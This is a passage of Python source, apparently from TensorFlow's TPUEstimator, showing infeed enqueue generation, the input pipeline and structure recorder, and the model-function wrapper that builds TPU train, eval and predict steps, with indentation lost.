num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
experimental_export_device_assignment,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
experimental_export_device_assignment: If `True`, use user-provided device
assignment. If `False`, round-robin computation among all TPU cores
visible to the host.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
if experimental_export_device_assignment:
return computation(computation_inputs)
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
host_call.record({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
